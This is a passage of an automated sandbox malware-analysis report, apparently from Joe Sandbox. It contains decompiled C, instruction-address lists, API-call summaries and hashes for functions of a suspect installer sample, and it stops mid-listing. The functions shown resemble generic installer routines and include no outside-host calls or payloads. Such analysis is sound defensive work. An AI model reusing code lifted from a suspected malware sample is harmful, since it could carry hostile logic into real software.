                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a21
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x00406a1b
                                                  0x004069a2
                                                  0x0040699f

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                  • Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
                                                  • Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                  • Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404FE7(0xffffffeb, _t13);
				_t15 = E0040555B(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060C3(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C59(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                  0x00401e21
                                                  0x00401e26
                                                  0x00401e2c
                                                  0x00401e33
                                                  0x00401e36
                                                  0x00402672
                                                  0x00401e3c
                                                  0x00401e3f
                                                  0x00401e50
                                                  0x00401e4b
                                                  0x00401e4b
                                                  0x00401e65
                                                  0x00401e6e
                                                  0x00401e7e
                                                  0x00401e80
                                                  0x00401e80
                                                  0x00401e70
                                                  0x00401e74
                                                  0x00401e74
                                                  0x00401e6e
                                                  0x00401e87
                                                  0x00401e8a
                                                  0x00401e8a
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                    • Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                    • Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D
                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                                  • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3521207402-0
                                                  • Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                  • Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
                                                  • Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                  • Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040365C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040365C() {
				void* _t1;
				void* _t2;
				void* _t4;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E004036B9();
				_t4 = E00405620(_t7, _t12, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsaAF60.tmp\\", 7); // executed
				return _t4;
			}








                                                  0x0040365c
                                                  0x0040366b
                                                  0x0040366e
                                                  0x00403670
                                                  0x00403670
                                                  0x00403677
                                                  0x0040367f
                                                  0x00403682
                                                  0x00403684
                                                  0x00403684
                                                  0x00403684
                                                  0x0040368b
                                                  0x00403697
                                                  0x0040369d

                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\, xrefs: 00403692
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\
                                                  • API String ID: 2962429428-1031102299
                                                  • Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                  • Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
                                                  • Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                  • Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423fb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42376c =  *0x42376c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
					}
				}
				return 0;
			}











                                                  0x0040138a
                                                  0x004013fa
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                  • Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
                                                  • Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                  • Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406087 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406087(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409248);
				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
				}
				_t5 = E0040601D(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                  0x0040608f
                                                  0x00406092
                                                  0x00406099
                                                  0x004060a1
                                                  0x004060ad
                                                  0x00000000
                                                  0x004060b4
                                                  0x004060a4
                                                  0x004060ab
                                                  0x00000000
                                                  0x004060bc
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                    • Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
                                                    • Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
                                                    • Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
